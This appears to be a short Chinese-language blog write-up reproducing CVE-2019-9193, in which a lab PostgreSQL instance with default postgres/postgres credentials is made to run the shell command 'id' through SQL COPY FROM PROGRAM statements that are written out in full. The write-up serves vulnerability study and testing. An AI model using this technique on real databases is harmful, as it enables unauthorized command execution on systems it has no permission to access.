CVE-2019-9193 PostgreSQL 高权限命令执行漏洞复现

CVE-2019-9193 PostgreSQL 高权限命令执行漏洞复现

PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。

启动漏洞环境后, 将开启Postgres默认的5432端口,默认账号密码为postgres/postgres, 连接到数据库。

执行以下sql语句。

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中。

查询命令执行的结果。

zgao

愿有一日,安全圈的师傅们都能用上Zgao写的工具。